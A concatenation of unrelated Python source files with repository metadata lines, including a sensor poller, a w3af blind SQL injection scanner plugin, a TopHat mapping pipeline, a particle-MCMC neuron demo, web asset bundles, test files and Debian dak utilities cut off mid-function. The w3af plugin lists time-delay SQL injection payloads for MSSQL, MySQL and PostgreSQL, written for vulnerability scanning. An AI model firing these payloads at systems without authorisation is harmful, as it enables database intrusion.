call(['python', PARSER, LOG_FILE, str(epoch)])
time.sleep(POLL_INTERVAL)
if __name__ == '__main__':
main()
| smart-cities/reading_aginova_sensors | scripts/poll.py | Python | gpl-2.0 | 580 |
'''
blind_sqli_time_delay.py
Copyright 2008 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from fuzzer import createMutants, createRandNum
import outputManager as om
import vuln as vuln
import knowledgeBase as kb
import severity as severity
import dbms as dbms
from w3afException import w3afException
# importing this to have sendMutant and setUrlOpener
from basePlugin import basePlugin
class blind_sqli_time_delay(basePlugin):
'''
This class tests for blind SQL injection bugs using time delays,
the logic is here and not as an audit plugin because this logic is also used in attack plugins.
@author: Andres Riancho ( andres.riancho@gmail.com )
'''
def __init__(self, crawler):
# ""I'm a plugin""
basePlugin.__init__(self, crawler)
# The wait time of the first test I'm going to perform
self._wait_time = 5
# The original delay between request and response
_original_wait_time = 0
def is_injectable( self, freq, parameter ):
'''
Check if "parameter" of the fuzzable request object is injectable or not.
@freq: The fuzzableRequest object that I have to modify
@parameter: A string with the parameter name to test
@return: A vulnerability object or None if nothing is found
'''
# First save the original wait time
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
# Create the mutants
parameter_to_test = [ parameter, ]
statement_list = self._get_statements()
sql_commands_only = [ i.sql_command for i in statement_list ]
mutants = createMutants( freq , sql_commands_only, fuzzableParamList=parameter_to_test )
# And now I assign the statement to the mutant
for statement in statement_list:
for mutant in mutants:
if statement.sql_command in mutant.getModValue():
mutant.statement = statement.sql_command
mutant.dbms = statement.dbms
# Perform the test
for mutant in mutants:
# Send
response = self._sendMutant( mutant, analyze=False )
# Compare times
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Resend the same request to verify that this wasn't because of network delay
# or some other rare thing
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
response = self._sendMutant( mutant, analyze=False )
# Compare times (once again)
if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
# Now I can be sure that I found a vuln, I control the time of the response.
v = vuln.vuln( mutant )
v.setName( 'Blind SQL injection - ' + mutant.dbms )
v.setSeverity(severity.HIGH)
v.setDesc( 'Blind SQL injection was found at: ' + mutant.foundAt() )
v.setDc( mutant.getDc() )
v.setId( response.id )
v.setURI( response.getURI() )
return v
return None
def _get_statements( self ):
'''
@return: A list of statements that are going to be used to test for
blind SQL injections. The statements are objects.
'''
res = []
# MSSQL
res.append( statement("1;waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1);waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1';waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1');waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1'));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
# MySQL
# =====
# MySQL doesn't have a sleep function, so I have to use BENCHMARK(1000000000,MD5(1))
# but the benchmarking will delay the response a different amount of time in each computer
# which sucks because I use the time delay to check!
#
# In my test environment 3500000 delays 10 seconds
# This is why I selected 2500000 which is guaranteeded to (at least) delay 8
# seconds; and I only check the delay like this:
# response.getWaitTime() > (_original_wait_time + self._wait_time-2):
#
# With a small wait time of 5 seconds, this should work without problems...
# and without hitting the xUrllib timeout !
res.append( statement("1 or BENCHMARK(2500000,MD5(1))", dbms.MYSQL) )
res.append( statement("1' or BENCHMARK(2500000,MD5(1)) or '1'='1", dbms.MYSQL) )
res.append( statement('1" or BENCHMARK(2500000,MD5(1)) or "1"="1', dbms.MYSQL) )
# PostgreSQL
res.append( statement("1 or pg_sleep("+ str(self._wait_time) +")", dbms.POSTGRE) )
res.append( statement("1' or pg_sleep("+ str(self._wait_time) +") or '1'='1", dbms.POSTGRE) )
res.append( statement('1" or pg_sleep('+ str(self._wait_time) +') or "1"="1', dbms.POSTGRE) )
# TODO: Add Oracle support
# TODO: Add XXXXX support
return res
class statement(object):
def __init__(self, sql_command, dbms):
self.sql_command = sql_command
self.dbms = dbms
| adamdoupe/enemy-of-the-state | audit/blind_sqli_time_delay.py | Python | gpl-2.0 | 6,458 |
# -*- encoding: utf-8 -*-
import sys
import os
import os.path
import glob
import logging
from utils import *
def splice_mapping( T, configs, audit ):
logging.debug( "Splice mapping..." )
# create the destination for splice alignments if not exists
try:
os.mkdir( configs['SPLICED_ALIGNER_PATH'] )
except OSError:
logging.warn( "%s directory already exists. Proceeding..." % \
configs['SPLICED_ALIGNER_PATH'] )
# tophat mapping (mapping with splice junctions)
for run,R in T.runs.iteritems():
# tophat [options] <bowtie_index> <reads1[,reads2,...]> [reads1[,reads2,...]] \
# [quals1,[quals2,...]] [quals1[,quals2,...]]
trimmed_files = glob.glob( configs['RRNA_MINUS_PATH'] + "/" + R.run + \
"*.fastq" )
paired_samples = configs['PAIRED_SAMPLES'].split( "," )
# sample-mapping options
smopts = configs[R.run].split( "," )
for s in smopts:
# try to make the tophat directory if it doesn't exist
try:
os.mkdir( configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" \
% ( os.path.basename( configs['SPLICED_ALIGNER']), s ))
except OSError:
logging.warn( "%s directory already exists. Proceeding..." % (\
configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" % \
( os.path.basename( configs['SPLICED_ALIGNER']), s )))
if configs['SPOT_TYPE'] == "paired":
trimmed_files.sort()
# spliced aligner
sa_cmd = "%s %s --output-dir %s --num-threads %s --GTF %s %s %s %s" % \
( configs['SPLICED_ALIGNER'], \
configs['SPLICED_ALIGNER_PARAMS'], \
configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" % \
( os.path.basename( configs['SPLICED_ALIGNER']), s ), \
configs['SPLICED_ALIGNER_THREADS'], \
configs['GTF_PATH' + s], \
configs['EBWT_PATH' + s], \
trimmed_files[0], \
trimmed_files[1] )
elif configs['SPOT_TYPE'] == "single":
# spliced aligner
sa_cmd = "%s %s --output-dir %s --num-threads %s --GTF %s %s %s" % (
configs['SPLICED_ALIGNER'], \
configs['SPLICED_ALIGNER_PARAMS'], \
configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" % \
( os.path.basename( configs['SPLICED_ALIGNER']), s ), \
configs['SPLICED_ALIGNER_THREADS'], \
configs['GTF_PATH' + s], \
configs['EBWT_PATH' + s], \
trimmed_files[0] )
elif configs['SPOT_TYPE'] == "mixed":
if R.run in paired_samples:
trimmed_files.sort()
# spliced aligner
sa_cmd = "%s %s --output-dir %s --num-threads %s --GTF %s %s %s %s" % \
( configs['SPLICED_ALIGNER'], \
configs['SPLICED_ALIGNER_PARAMS'], \
configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" % \
( os.path.basename( configs['SPLICED_ALIGNER']), s ), \
configs['SPLICED_ALIGNER_THREADS'], \
configs['GTF_PATH' + s], \
configs['EBWT_PATH' + s], \
trimmed_files[0], \
trimmed_files[1] )
else:
# spliced aligner
sa_cmd = "%s %s --output-dir %s --num-threads %s --GTF %s %s %s" % (
configs['SPLICED_ALIGNER'], \
configs['SPLICED_ALIGNER_PARAMS'], \
configs['SPLICED_ALIGNER_PATH'] + "/" + R.run + "_%s_ebwt%s" % \
( os.path.basename( configs['SPLICED_ALIGNER']), s ), \
configs['SPLICED_ALIGNER_THREADS'], \
configs['GTF_PATH' + s], \
configs['EBWT_PATH' + s], \
trimmed_files[0] )
logging.debug( sa_cmd )
if not audit:
run_command( sa_cmd )
| polarise/breeze | breeze/splice_mapping.py | Python | gpl-2.0 | 3,421 |
def find_number(x):
str_x = str(x)
if len(str_x) == 1:
raise Exception()
left_most = str_x[0]
try:
small_from_rest = find_number(int(str_x[1:]))
return int(left_most + str(small_from_rest))
except:
# min() will throw exception if parameter is empty list, meaning no digit is greater than the left_most digit.
new_left_most = min([c for c in str_x[1:] if c > left_most])
# assumption: no repeated digit
rest_of_digits = ''.join(sorted([c for c in str_x if c != new_left_most]))
y = new_left_most + rest_of_digits
return int(y)
print(find_number(5346)) | danithaca/berrypicking | python/excercise/march31.py | Python | gpl-2.0 | 644 |
"""
Computes and stores a lookup table for a given environment and reward function.
A list of reward functions will be added here and refered to by the keyword "rType".
"""
class Reward:
def __init__(self,environment,rType):
def exampleReward(self,environment):
return | ProjectALTAIR/Simulation | mdp/reward.py | Python | gpl-2.0 | 288 |
import numpy as np
# Set the random seed for reproducibility
seed = np.random.randint(2**16)
print "Seed: ", seed
np.random.seed(seed)
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from optofit.cneuron.compartment import Compartment, SquidCompartment
from optofit.cneuron.channels import LeakChannel, NaChannel, KdrChannel
from optofit.cneuron.simulate import forward_euler
from hips.inference.particle_mcmc import *
from optofit.cinference.pmcmc import *
# Make a simple compartment
hypers = {
'C' : 1.0,
'V0' : -60.0,
'g_leak' : 0.3,
'E_leak' : -65.0,
'g_na' : 120.0,
'E_na' : 50.0,
'g_kdr' : 36.0,
'E_kdr' : -77.0
}
def sample_model():
# # Add a few channels
# body = Compartment(name='body', hypers=hypers)
# leak = LeakChannel(name='leak', hypers=hypers)
# na = NaChannel(name='na', hypers=hypers)
# kdr = KdrChannel(name='kdr', hypers=hypers)
#
# body.add_child(leak)
# body.add_child(na)
# body.add_child(kdr)
# Initialize the model
# body.initialize_offsets()
squid_body = SquidCompartment(name='body', hypers=hypers)
# Initialize the model
D, I = squid_body.initialize_offsets()
# Set the recording duration
t_start = 0
t_stop = 100.
dt = 0.01
t = np.arange(t_start, t_stop, dt)
T = len(t)
# Make input with an injected current from 500-600ms
inpt = np.zeros((T, I))
inpt[50/dt:60/dt,:] = 7.
inpt += np.random.randn(T, I)
# Set the initial distribution to be Gaussian around the steady state
z0 = np.zeros(D)
squid_body.steady_state(z0)
init = GaussianInitialDistribution(z0, 0.1**2 * np.eye(D))
# Set the proposal distribution using Hodgkin Huxley dynamics
# TODO: Fix the hack which requires us to know the number of particles
N = 100
sigmas = 0.0001*np.ones(D)
# Set the voltage transition dynamics to be a bit noisier
sigmas[squid_body.x_offset] = 0.25
prop = HodgkinHuxleyProposal(T, N, D, squid_body, sigmas, t, inpt)
# Set the observation model to observe only the voltage
etas = np.ones(1)
observed_dims = np.array([squid_body.x_offset]).astype(np.int32)
lkhd = PartialGaussianLikelihood(observed_dims, etas)
# Initialize the latent state matrix to sample N=1 particle
z = np.zeros((T,N,D))
z[0,0,:] = init.sample()
# Initialize the output matrix
x = np.zeros((T,D))
# Sample the latent state sequence
for i in np.arange(0,T-1):
# The interface kinda sucks. We have to tell it that
# the first particle is always its ancestor
prop.sample_next(z, i, np.array([0], dtype=np.int32))
# Sample observations
for i in np.arange(0,T):
lkhd.sample(z,x,i,0)
# Extract the first (and in this case only) particle
z = z[:,0,:].copy(order='C')
# Plot the first particle trajectory
plt.ion()
fig = plt.figure()
# fig.add_subplot(111, aspect='equal')
plt.plot(t, z[:,observed_dims[0]], 'k')
plt.plot(t, x[:,0], 'r')
plt.show()
plt.pause(0.01)
return t, z, x, init, prop, lkhd
# Now run the pMCMC inference
def sample_z_given_x(t, z_curr, x,
init, prop, lkhd,
N_particles=100,
plot=False):
T,D = z_curr.shape
T,O = x.shape
# import pdb; pdb.set_trace()
pf = ParticleGibbsAncestorSampling(T, N_particles, D)
pf.initialize(init, prop, lkhd, x, z_curr)
S = 100
z_smpls = np.zeros((S,T,D))
l = plt.plot(t, z_smpls[0,:,0], 'b')
for s in range(S):
print "Iteration %d" % s
# Reinitialize with the previous particle
pf.initialize(init, prop, lkhd, x, z_smpls[s,:,:])
z_smpls[s,:,:] = pf.sample()
l[0].set_data(t, z_smpls[s,:,0])
plt.pause(0.01)
z_mean = z_smpls.mean(axis=0)
z_std = z_smpls.std(axis=0)
z_env = np.zeros((T*2,2))
z_env[:,0] = np.concatenate((t, t[::-1]))
z_env[:,1] = np.concatenate((z_mean[:,0] + z_std[:,0], z_mean[::-1,0] - z_std[::-1,0]))
if plot:
plt.gca().add_patch(Polygon(z_env, facecolor='b', alpha=0.25, edgecolor='none'))
plt.plot(t, z_mean[:,0], 'b', lw=1)
# Plot a few random samples
# for s in range(10):
# si = np.random.randint(S)
# plt.plot(t, z_smpls[si,:,0], '-b', lw=0.5)
plt.ioff()
plt.show()
return z_smpls
t, z, x, init, prop, lkhd = sample_model()
sample_z_given_x(t, z, x, init, prop, lkhd, plot=True) | HIPS/optofit | examples/cython_demo.py | Python | gpl-2.0 | 4,626 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016, 2017 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""JS/CSS bundles for Records."""
from __future__ import absolute_import, print_function
from flask_assets import Bundle
from invenio_assets import NpmBundle
stats_js = NpmBundle(
"node_modules/invenio-charts-js/dist/lib.bundle.js",
"js/cds_records/stats.js",
output="gen/cds.records.stats.%(version)s.js",
npm={
"invenio-charts-js": "^0.2.2",
},
)
stats_css = Bundle(
Bundle(
"node_modules/invenio-charts-js/src/styles/styles.scss",
"scss/stats.scss",
filters="node-scss,cleancssurl",
),
output="gen/cds.stats.%(version)s.css",
)
js = NpmBundle(
Bundle(
"node_modules/cds/dist/cds.js",
"node_modules/angular-sanitize/angular-sanitize.js",
"node_modules/angular-strap/dist/angular-strap.js",
"node_modules/invenio-files-js/dist/invenio-files-js.js",
"node_modules/ngmodal/dist/ng-modal.js",
"js/cds_records/main.js",
"js/cds_records/user_actions_logger.js",
filters="jsmin",
),
depends=("node_modules/cds/dist/*.js",),
filters="jsmin",
output="gen/cds.record.%(version)s.js",
npm={
"angular": "~1.4.10",
"angular-sanitize": "~1.4.10",
"angular-loading-bar": "~0.9.0",
"cds": "~0.2.0",
"ng-dialog": "~0.6.0",
"ngmodal": "~2.0.1",
},
)
| CERNDocumentServer/cds-videos | cds/modules/records/bundles.py | Python | gpl-2.0 | 2,122 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
report = report_for("""
import pytest
import allure
def test_x():
%s.attach('Foo', 'Bar')
""" % package)
assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
report = report_for("""
import allure as A
def test_x():
A.attach('Foo', 'Bar', A.attach_type.%s)
""" % a_type)
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
@pytest.fixture
def attach_contents(self, report_for, reportdir):
"""
Fixture that returns contents of the attachment file for given attach body
"""
def impl(body):
report = report_for("""
from pytest import allure as A
def test_x():
A.attach('Foo', %s, A.attach_type.TEXT)
""" % repr(body))
filename = report.find('.//attachment').get('source')
return reportdir.join(filename).read('rb')
return impl
def test_ascii(self, attach_contents):
assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))
def test_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь'))
def test_broken_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
def test_attach_in_fixture_teardown(report_for):
"""
Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
"""
report = report_for("""
import pytest
@pytest.yield_fixture(scope='function')
def myfix():
yield
pytest.allure.attach('Foo', 'Bar')
def test_x(myfix):
assert True
""")
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
| pvarenik/PyCourses | allure-python-master/tests/test_attach.py | Python | gpl-2.0 | 2,550 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-09-21 00:22
from __future__ import unicode_literals
from django.db import migrations, models
import themes.models
class Migration(migrations.Migration):
dependencies = [
('themes', '0006_auto_20170610_1512'),
]
operations = [
migrations.AddField(
model_name='themes',
name='high_contrats_logo',
field=models.ImageField(blank=True, null=True, upload_to='themes/', validators=[themes.models.validate_img_extension], verbose_name='High Contrast Logo'),
),
]
| amadeusproject/amadeuslms | themes/migrations/0007_themes_high_contrats_logo.py | Python | gpl-2.0 | 597 |
#!/usr/bin/env python
# vim:set et ts=4 sw=4:
"""Utility functions
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2000, 2001, 2002, 2003, 2004, 2005, 2006 James Troup <james@nocrew.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import commands
import email.Header
import os
import pwd
import select
import socket
import shutil
import sys
import tempfile
import traceback
import stat
import apt_inst
import apt_pkg
import time
import re
import email as modemail
import subprocess
from dbconn import DBConn, get_architecture, get_component, get_suite, \
get_override_type, Keyring, session_wrapper, \
get_active_keyring_paths, get_primary_keyring_path
from sqlalchemy import desc
from dak_exceptions import *
from gpg import SignedFile
from textutils import fix_maintainer
from regexes import re_html_escaping, html_escaping, re_single_line_field, \
re_multi_line_field, re_srchasver, re_taint_free, \
re_gpg_uid, re_re_mark, re_whitespace_comment, re_issource, \
re_is_orig_source
from formats import parse_format, validate_changes_format
from srcformats import get_format_from_string
from collections import defaultdict
################################################################################
default_config = "/etc/dak/dak.conf" #: default dak config, defines host properties
default_apt_config = "/etc/dak/apt.conf" #: default apt config, not normally used
alias_cache = None #: Cache for email alias checks
key_uid_email_cache = {} #: Cache for email addresses from gpg key uids
# (hashname, function, earliest_changes_version)
known_hashes = [("sha1", apt_pkg.sha1sum, (1, 8)),
("sha256", apt_pkg.sha256sum, (1, 8))] #: hashes we accept for entries in .changes/.dsc
# Monkeypatch commands.getstatusoutput as it may not return the correct exit
# code in lenny's Python. This also affects commands.getoutput and
# commands.getstatus.
def dak_getstatusoutput(cmd):
pipe = subprocess.Popen(cmd, shell=True, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = pipe.stdout.read()
pipe.wait()
if output[-1:] == '\n':
output = output[:-1]
ret = pipe.wait()
if ret is None:
ret = 0
return ret, output
commands.getstatusoutput = dak_getstatusoutput
################################################################################
def html_escape(s):
""" Escape html chars """
return re_html_escaping.sub(lambda x: html_escaping.get(x.group(0)), s)
################################################################################
def open_file(filename, mode='r'):
"""
Open C{file}, return fileobject.
@type filename: string
@param filename: path/filename to open
@type mode: string
@param mode: open mode
@rtype: fileobject
@return: open fileobject
@raise CantOpenError: If IOError is raised by open, reraise it as CantOpenError.
"""
try:
f = open(filename, mode)
except IOError:
raise CantOpenError(filename)
return f
################################################################################
def our_raw_input(prompt=""):
if prompt:
while 1:
try:
sys.stdout.write(prompt)
break
except IOError:
pass
sys.stdout.flush()
try:
ret = raw_input()
return ret
except EOFError:
sys.stderr.write("\nUser interrupt (^D).\n")
raise SystemExit
################################################################################
def extract_component_from_section(section, session=None):
component = ""
if section.find('/') != -1:
component = section.split('/')[0]
# Expand default component
if component == "":
comp = get_component(section, session)
if comp is None:
component = "main"
else:
component = comp.component_name
return (section, component)
################################################################################
def parse_deb822(armored_contents, signing_rules=0, keyrings=None, session=None):
require_signature = True
if keyrings == None:
keyrings = []
require_signature = False
signed_file = SignedFile(armored_contents, keyrings=keyrings, require_signature=require_signature)
contents = signed_file.contents
error = ""
changes = {}
# Split the lines in the input, keeping the linebreaks.
lines = contents.splitlines(True)
if len(lines) == 0:
raise ParseChangesError("[Empty changes file]")
# Reindex by line number so we can easily verify the format of
# .dsc files...
index = 0
indexed_lines = {}
for line in lines:
index += 1
indexed_lines[index] = line[:-1]
num_of_lines = len(indexed_lines.keys())
index = 0
first = -1
while index < num_of_lines:
index += 1
line = indexed_lines[index]
if line == "" and signing_rules == 1:
if index != num_of_lines:
raise InvalidDscError(index)
break
slf = re_single_line_field.match(line)
if slf:
field = slf.groups()[0].lower()
changes[field] = slf.groups()[1]
first = 1
continue
if line == " .":
changes[field] += '\n'
continue
mlf = re_multi_line_field.match(line)
if mlf:
if first == -1:
raise ParseChangesError("'%s'\n [Multi-line field continuing on from nothing?]" % (line))
if first == 1 and changes[field] != "":
changes[field] += '\n'
first = 0
changes[field] += mlf.groups()[0] + '\n'
continue
error += line
changes["filecontents"] = armored_contents
if changes.has_key("source"):
# Strip the source version in brackets from the source field,
# put it in the "source-version" field instead.
srcver = re_srchasver.search(changes["source"])
if srcver:
changes["source"] = srcver.group(1)
changes["source-version"] = srcver.group(2)
if error:
raise ParseChangesError(error)
return changes
################################################################################
def parse_changes(filename, signing_rules=0, dsc_file=0, keyrings=None):
"""
Parses a changes file and returns a dictionary where each field is a
key. The mandatory first argument is the filename of the .changes
file.
signing_rules is an optional argument:
- If signing_rules == -1, no signature is required.
- If signing_rules == 0 (the default), a signature is required.
- If signing_rules == 1, it turns on the same strict format checking
as dpkg-source.
The rules for (signing_rules == 1)-mode are:
- The PGP header consists of "-----BEGIN PGP SIGNED MESSAGE-----"
followed by any PGP header data and must end with a blank line.
- The data section must end with a blank line and must be followed by
"-----BEGIN PGP SIGNATURE-----".
"""
changes_in = open_file(filename)
content = changes_in.read()
changes_in.close()
try:
unicode(content, 'utf-8')
except UnicodeError:
raise ChangesUnicodeError("Changes file not proper utf-8")
changes = parse_deb822(content, signing_rules, keyrings=keyrings)
if not dsc_file:
# Finally ensure that everything needed for .changes is there
must_keywords = ('Format', 'Date', 'Source', 'Binary', 'Architecture', 'Version',
'Distribution', 'Maintainer', 'Description', 'Changes', 'Files')
missingfields=[]
for keyword in must_keywords:
if not changes.has_key(keyword.lower()):
missingfields.append(keyword)
if len(missingfields):
raise ParseChangesError("Missing mandantory field(s) in changes file (policy 5.5): %s" % (missingfields))
return changes
################################################################################
def hash_key(hashname):
return '%ssum' % hashname
################################################################################
def create_hash(where, files, hashname, hashfunc):
"""
create_hash extends the passed files dict with the given hash by
iterating over all files on disk and passing them to the hashing
function given.
"""
rejmsg = []
for f in files.keys():
try:
file_handle = open_file(f)
except CantOpenError:
rejmsg.append("Could not open file %s for checksumming" % (f))
continue
files[f][hash_key(hashname)] = hashfunc(file_handle)
file_handle.close()
return rejmsg
################################################################################
def check_hash(where, files, hashname, hashfunc):
"""
check_hash checks the given hash in the files dict against the actual
files on disk. The hash values need to be present consistently in
all file entries. It does not modify its input in any way.
"""
rejmsg = []
for f in files.keys():
file_handle = None
try:
try:
file_handle = open_file(f)
# Check for the hash entry, to not trigger a KeyError.
if not files[f].has_key(hash_key(hashname)):
rejmsg.append("%s: misses %s checksum in %s" % (f, hashname,
where))
continue
# Actually check the hash for correctness.
if hashfunc(file_handle) != files[f][hash_key(hashname)]:
rejmsg.append("%s: %s check failed in %s" % (f, hashname,
where))
except CantOpenError:
# TODO: This happens when the file is in the pool.
# warn("Cannot open file %s" % f)
continue
finally:
if file_handle:
file_handle.close()
return rejmsg
################################################################################
def check_size(where, files):
"""
check_size checks the file sizes in the passed files dict against the
files on disk.
"""
rejmsg = []
for f in files.keys():
try:
entry = os.stat(f)
except OSError as exc:
if exc.errno == 2:
# TODO: This happens when the file is in the pool.
continue
raise
actual_size = entry[stat.ST_SIZE]
size = int(files[f]["size"])
if size != actual_size:
rejmsg.append("%s: actual file size (%s) does not match size (%s) in %s"
% (f, actual_size, size, where))
return rejmsg
################################################################################
def check_dsc_files(dsc_filename, dsc=None, dsc_files=None):
"""
Verify that the files listed in the Files field of the .dsc are
those expected given the announced Format.
@type dsc_filename: string
@param dsc_filename: path of .dsc file
@type dsc: dict
@param dsc: the content of the .dsc parsed by C{parse_changes()}
@type dsc_files: dict
@param dsc_files: the file list returned by C{build_file_list()}
@rtype: list
@return: all errors detected
"""
rejmsg = []
# Parse the file if needed
if dsc is None:
dsc = parse_changes(dsc_filename, signing_rules=1, dsc_file=1);
if dsc_files is None:
dsc_files = build_file_list(dsc, is_a_dsc=1)
# Ensure .dsc lists proper set of source files according to the format
# announced
has = defaultdict(lambda: 0)
ftype_lookup = (
(r'orig.tar.gz', ('orig_tar_gz', 'orig_tar')),
(r'diff.gz', ('debian_diff',)),
(r'tar.gz', ('native_tar_gz', 'native_tar')),
(r'debian\.tar\.(gz|bz2|xz)', ('debian_tar',)),
(r'orig\.tar\.(gz|bz2|xz)', ('orig_tar',)),
(r'tar\.(gz|bz2|xz)', ('native_tar',)),
(r'orig-.+\.tar\.(gz|bz2|xz)', ('more_orig_tar',)),
)
for f in dsc_files.keys():
m = re_issource.match(f)
if not m:
rejmsg.append("%s: %s in Files field not recognised as source."
% (dsc_filename, f))
continue
# Populate 'has' dictionary by resolving keys in lookup table
matched = False
for regex, keys in ftype_lookup:
if re.match(regex, m.group(3)):
matched = True
for key in keys:
has[key] += 1
break
# File does not match anything in lookup table; reject
if not matched:
reject("%s: unexpected source file '%s'" % (dsc_filename, f))
# Check for multiple files
for file_type in ('orig_tar', 'native_tar', 'debian_tar', 'debian_diff'):
if has[file_type] > 1:
rejmsg.append("%s: lists multiple %s" % (dsc_filename, file_type))
# Source format specific tests
try:
format = get_format_from_string(dsc['format'])
rejmsg.extend([
'%s: %s' % (dsc_filename, x) for x in format.reject_msgs(has)
])
except UnknownFormatError:
# Not an error here for now
pass
return rejmsg
################################################################################
def check_hash_fields(what, manifest):
"""
check_hash_fields ensures that there are no checksum fields in the
given dict that we do not know about.
"""
rejmsg = []
hashes = map(lambda x: x[0], known_hashes)
for field in manifest:
if field.startswith("checksums-"):
hashname = field.split("-",1)[1]
if hashname not in hashes:
rejmsg.append("Unsupported checksum field for %s "\
"in %s" % (hashname, what))
return rejmsg
################################################################################
def _ensure_changes_hash(changes, format, version, files, hashname, hashfunc):
if format >= version:
# The version should contain the specified hash.
func = check_hash
# Import hashes from the changes
rejmsg = parse_checksums(".changes", files, changes, hashname)
if len(rejmsg) > 0:
return rejmsg
else:
# We need to calculate the hash because it can't possibly
# be in the file.
func = create_hash
return func(".changes", files, hashname, hashfunc)
# We could add the orig which might be in the pool to the files dict to
# access the checksums easily.
def _ensure_dsc_hash(dsc, dsc_files, hashname, hashfunc):
"""
ensure_dsc_hashes' task is to ensure that each and every *present* hash
in the dsc is correct, i.e. identical to the changes file and if necessary
the pool. The latter task is delegated to check_hash.
"""
rejmsg = []
if not dsc.has_key('Checksums-%s' % (hashname,)):
return rejmsg
# Import hashes from the dsc
parse_checksums(".dsc", dsc_files, dsc, hashname)
# And check it...
rejmsg.extend(check_hash(".dsc", dsc_files, hashname, hashfunc))
return rejmsg
################################################################################
def parse_checksums(where, files, manifest, hashname):
rejmsg = []
field = 'checksums-%s' % hashname
if not field in manifest:
return rejmsg
for line in manifest[field].split('\n'):
if not line:
break
clist = line.strip().split(' ')
if len(clist) == 3:
checksum, size, checkfile = clist
else:
rejmsg.append("Cannot parse checksum line [%s]" % (line))
continue
if not files.has_key(checkfile):
# TODO: check for the file's entry in the original files dict, not
# the one modified by (auto)byhand and other weird stuff
# rejmsg.append("%s: not present in files but in checksums-%s in %s" %
# (file, hashname, where))
continue
if not files[checkfile]["size"] == size:
rejmsg.append("%s: size differs for files and checksums-%s entry "\
"in %s" % (checkfile, hashname, where))
continue
files[checkfile][hash_key(hashname)] = checksum
for f in files.keys():
if not files[f].has_key(hash_key(hashname)):
rejmsg.append("%s: no entry in checksums-%s in %s" % (f, hashname, where))
return rejmsg
################################################################################
# Dropped support for 1.4 and ``buggy dchanges 3.4'' (?!) compared to di.pl
def build_file_list(changes, is_a_dsc=0, field="files", hashname="md5sum"):
files = {}
# Make sure we have a Files: field to parse...
if not changes.has_key(field):
raise NoFilesFieldError
# Validate .changes Format: field
if not is_a_dsc:
validate_changes_format(parse_format(changes['format']), field)
includes_section = (not is_a_dsc) and field == "files"
# Parse each entry/line:
for i in changes[field].split('\n'):
if not i:
break
s = i.split()
section = priority = ""
try:
if includes_section:
(md5, size, section, priority, name) = s
else:
(md5, size, name) = s
except ValueError:
raise ParseChangesError(i)
if section == "":
section = "-"
if priority == "":
priority = "-"
(section, component) = extract_component_from_section(section)
files[name] = dict(size=size, section=section,
priority=priority, component=component)
files[name][hashname] = md5
